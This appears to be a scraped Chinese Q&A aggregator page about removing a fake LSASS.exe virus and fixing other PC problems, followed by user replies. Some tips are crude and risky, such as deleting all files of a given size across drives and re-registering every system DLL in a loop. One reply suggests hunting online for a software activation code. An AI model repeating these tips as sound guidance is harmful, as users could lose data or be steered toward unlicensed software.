設(shè)定c:\windows為當(dāng)前系統(tǒng)盤,運(yùn)行winpe中的注冊表編輯器,刪除RUN鍵值中的LSASS.exe條目,修改HKEY_CLASSES_ROOT下.exe默認(rèn)鍵值回到exefile,修改HKEY_CLASSES_ROOT下exefile鍵值為"%1" %*。刪除d:\autorun.inf和command.com文件。
4、補(bǔ)充建議:
目前最新的趨勢版本病毒碼3.343,清除模塊730,不能查出該病毒。使用的windows的補(bǔ)丁包打好,使用上面方法殺掉病毒后,最好再裝一個(gè)最新的瑞星。
如果不放心就徹底再查殺一遍系統(tǒng),防止再生成。
1、我也中過這個(gè)病毒,重裝系統(tǒng)后過幾天會再產(chǎn)生的。
這應(yīng)該是種winfile病毒。
LSASS.EXE為正常的系統(tǒng)進(jìn)程,而LSASS.exe為病毒進(jìn)程。
2、原因應(yīng)該是:
該病毒修改注冊表啟動RUN鍵值,指向LSASS.exe,修改HKEY_CLASSES_ROOT下的.exe,exefile鍵值,并新建windowfile鍵值。將exe文件打開鏈接關(guān)聯(lián)到其生成的病毒程序%SYSTEM\EXERT.exe上。
3、殺毒方法:
使用winpe光盤啟動,如 深山紅葉
找到并刪除上述文件,并使用搜索功能,查找全部硬盤文件大小在41KB到43KB之間的所有文件,在結(jié)果中查看并刪除大小為42.02KB的所有文件。
設(shè)定c:\windows為當(dāng)前系統(tǒng)盤,運(yùn)行winpe中的注冊表編輯器,刪除RUN鍵值中的LSASS.exe條目,修改HKEY_CLASSES_ROOT下.exe默認(rèn)鍵值回到exefile,修改HKEY_CLASSES_ROOT下exefile鍵值為"%1" %*。刪除d:\autorun.inf和command.com文件。
4、補(bǔ)充建議:
目前最新的趨勢版本病毒碼3.343,清除模塊730,不能查出該病毒。使用的windows的補(bǔ)丁包打好,使用上面方法殺掉病毒后,最好再裝一個(gè)最新的瑞星。
如果不放心就徹底再查殺一遍系統(tǒng),防止再生成。
電腦無法關(guān)機(jī)怎么辦
第一種情況:電腦無法正常關(guān)機(jī),可能是電腦中毒,其中的病毒文件在搗亂,這個(gè)時(shí)候,咱們不妨先開啟電腦中的殺毒軟件進(jìn)行全盤掃描,若是掃描時(shí)間很長的話,大家可以設(shè)置一下殺毒之后自動關(guān)機(jī),就不用守著電腦了。第二種情況:如果殺毒還是無法解決問題的話,咱們就需要對配置文件進(jìn)行修復(fù)了。操作的具體步驟:...
如何解決電腦藍(lán)屏代碼為STOP:0*000000ED(0*89B4A7B8,0*C0000006,0*000...
3 點(diǎn) 開始菜單 運(yùn)行 輸入 cmd 回車,在命令提示符下輸入 for %1 in (%windir%\\system32\\*.dll) do regsvr32.exe \/s %1 然后 回車。然后讓他運(yùn)行完,應(yīng)該就可能解決。4 最近電腦中毒、安裝了不穩(wěn)定的軟件、等,建議全盤殺毒,卸了那個(gè)引發(fā)問題的軟件,重新安裝其他 版本,就可能解決. 再不...
電腦每天自動安裝垃圾軟件怎么辦?
1、首先需要斷開網(wǎng)絡(luò),卸載以及安裝的垃圾軟件,然后掃毒殺毒,提高電腦的安全度。2、另外需要檢查一下電腦是否中病毒了,電腦中毒之后,所有的防御系統(tǒng)可能會被攻破,導(dǎo)致自動安裝垃圾軟件,這種情況需要下載專門的殺毒軟件,對電腦所含病毒進(jìn)行徹底查殺就可以了。3、也可以通過重裝系統(tǒng)來解決這個(gè)問題。_x000b_\/ 主要原因有:...
win10電腦只有c盤怎么辦
步驟1. 在“此電腦”上右鍵點(diǎn)擊,選擇“管理”,然后在“計(jì)算機(jī)管理”窗口的左側(cè)列表中選擇“磁盤管理”。在Windows 10中也可以右鍵點(diǎn)擊開始菜單,直接選擇“磁盤管理”功能。步驟2. 在分區(qū)列表中,右鍵點(diǎn)擊希望重新分區(qū)的部分,選擇“壓縮卷”,系統(tǒng)經(jīng)過分析后會給出可用壓縮容量。步驟3. 輸入希望分出的...
中毒了,360安全衛(wèi)士都打不開,怎么辦?
電腦中毒導(dǎo)致360安全衛(wèi)士無法打開時(shí),可能是因?yàn)橄到y(tǒng)中存在木馬或惡意程序破壞了360安全衛(wèi)士。為了解決此問題,可以通過下載并使用免費(fèi)的殺木馬軟件木馬克星來解決。下載并解壓木馬克星的安裝包,運(yùn)行文件夾中的“注冊.reg”文件,將注冊表導(dǎo)入,完成注冊。接著,運(yùn)行文件夾中的主程序iparmor,即可使用木馬克星...
一開機(jī)就彈出 刪除文件錯(cuò)誤(急)
你的電腦中毒了,解決辦法有很多,最簡單辦法的就是用360安全衛(wèi)士清理一下,重啟電腦,另外你的電腦防火墻太差,你得下個(gè)殺毒軟件安裝一下。內(nèi)存做夠的話,你可你用AVG中文版免費(fèi)殺毒軟件。我保證你的電腦永遠(yuǎn)不會出現(xiàn)刪掉后又出現(xiàn)的問題。你主機(jī)前面的耳機(jī)插座的接地腳(有四個(gè)焊接點(diǎn),其中一個(gè)是地腳...
電腦問題
(取內(nèi)存的圖片如下:)如果是筆記本這一步跳過 第三個(gè)原因:就是電腦的系統(tǒng)中毒了,病毒破壞了操作系統(tǒng),造成無法引導(dǎo)系統(tǒng),而導(dǎo)至的反復(fù)藍(lán)屏,同時(shí)也會伴有藍(lán)屏代碼的,所以建義一鍵還原或者重裝系統(tǒng),做完系統(tǒng)后,安裝殺毒軟件,全盤殺毒。希望我的回答對你有所幫助,祝你成功,快樂~~~...
我的華碩筆記本電腦出現(xiàn)stop:0*000000a5(0*0001000a,0*00000000,0*0000...
出現(xiàn)此問題有兩個(gè)原因 一、通常是因?yàn)橹靼錌IOS不能全面支持ACPI規(guī)范.二、顯卡松動或者金手指氧化了。建議你可以試試以下方法解決 1、硬件沖突.檢查近期安裝的硬件中,有無驅(qū)動程序未正常安裝,或主板不支持的軟硬件,將其卸載。2、檢查內(nèi)存條,確定主板對內(nèi)存是否兼容,若新增內(nèi)存條,將其拔下,再試系統(tǒng)是否...
電腦最近老出現(xiàn)問題 出現(xiàn)對話框 說遇到問題需要關(guān)閉
先殺毒..確定沒病毒后按下面的方法去解決該問題:1。 在"開始"菜單中打開"運(yùn)行"窗口,在其中輸入"regsvr32 actxprxy.dll",然后"確定",接著會出現(xiàn)一個(gè)信息對話 框"DllRegisterServer in actxprxy.dll succeeded",再次點(diǎn)擊"確定"。2 再次打開"運(yùn)行"窗口,輸入"regsvr32 shdocvw.dll 3 再次打開"運(yùn)行"...
高手快來啊..電腦中毒了.自動關(guān)閉我的網(wǎng)頁啊`
..最近病毒高發(fā)..你在C:\/WINDOWS\/SYSTEM下面有沒有看到幾個(gè)以000開頭的EXE文件..還有一個(gè)DD.EXE的文件如果有刪除..下個(gè)360安全衛(wèi)士.在SYSTEM32的文件夾下有一個(gè)KV開頭的EXE文件也要刪了應(yīng)該就沒有問題.(以上要進(jìn)入安全模式查殺)
相關(guān)評說:
建鄴區(qū)急回: ______ 親可以下一個(gè)Advanced SystemCare Pro 在網(wǎng)上找一個(gè)激活碼 然后深度清理 不行的話只有做系統(tǒng)了
建鄴區(qū)急回: ______ ***強(qiáng)力推薦:更精彩的實(shí)戰(zhàn)真實(shí)詳細(xì)記錄請看: 【實(shí)戰(zhàn)】U盤專殺妙解雙擊不能打開磁盤分區(qū)(explorer加載) New New 使用的方法: [分享]更簡單的清除頑固病毒的方法 New 【分享】教你妙用360清除頑固木馬(如新的asn.2病毒等) 多種方...
建鄴區(qū)急回: ______ 電腦中毒分很簡單的兩部進(jìn)行啦: 1、安裝殺毒軟件殺毒(其實(shí)毒一般是殺不了的,只能隔離)也可以用專殺軟件殺毒. 2、如果電腦還出現(xiàn)問題,只有格C盤,把自己有用的東西存在D盤或者其他盤里.格C盤的意思也就是把C盤的東西全部刪除,重新再裝一遍系統(tǒng),這也是最徹底的殺毒方法了.
建鄴區(qū)急回: ______ 對于特殊的一些不能刪除的病毒或流氓軟件 可以采用一些非正常方法,如網(wǎng)上介紹的采用映象劫持的方法,讓部分文件不能正常加載運(yùn)行,然后再刪除之.還可以使用U盤啟動PE系統(tǒng),找到病毒文件,刪除之也可以 :) 這里大家可以充分展開...
建鄴區(qū)急回: ______ 用電腦管家或者安全衛(wèi)士等工具進(jìn)行查殺或者重新安裝系統(tǒng).
建鄴區(qū)急回: ______ 親,電腦中毒了被病毒黑客設(shè)置密碼這個(gè)千萬不要加內(nèi)中黑客給錢,建議親重做系統(tǒng),做完系統(tǒng)后立刻下載騰訊電腦管家徹底殺毒,然后看是否還有殘留插件也卸載粉碎,最后開啟防火墻.我給親推薦下載安裝騰訊電腦管家來進(jìn)行解決,打開殺...
建鄴區(qū)急回: ______ 我個(gè)人的建議啊 希望對你有所幫助電腦中毒了啊 殺毒軟件是很難把電腦病毒殺徹底的啊 而且你的殺毒軟件很容易被病毒破壞而不能用 而且現(xiàn)在的病毒有好多都是免殺的 你最好的辦法是把你的電腦系統(tǒng)重新裝一下系統(tǒng) 還有就是要把其他的盤中...
建鄴區(qū)急回: ______ 其實(shí)你這種情況最好的方法就是重新做系統(tǒng),雖然說也許可以有能在先查殺的軟件幫助你查掉病毒,但是你電腦有很多東西都被更改,你在繼續(xù)適用也是給自己找麻煩.重做系統(tǒng)是個(gè)好的選擇!
建鄴區(qū)急回: ______ 我的電腦中毒了,殺毒軟件、360和專殺工具只要一打開就會自動關(guān)閉 估計(jì)是中了AV終結(jié)者或類似木馬 一.中毒現(xiàn)象 病毒在移動設(shè)備或硬盤根目錄下生成Autorun.inf文件,用戶雙擊盤符即可激活病毒 關(guān)閉眾多殺毒軟件和安全工具 修改注冊表,...
建鄴區(qū)急回: ______ 中毒了,先斷開網(wǎng)線. 如果能正常啟動的話,用殺毒軟件和安全衛(wèi)士360之類的軟件全盤殺毒. 如果還有這種問題的話,在進(jìn)入安全模式下再殺一遍,一般都可以解決這種問題! 如果不能啟動,那就只好重裝系統(tǒng)了. 或者拆下硬盤,到別的電腦上去殺毒,但要注意主從跳線的選擇! 最后最好裝上防火墻和殺毒軟件,下載資源時(shí)小心些!
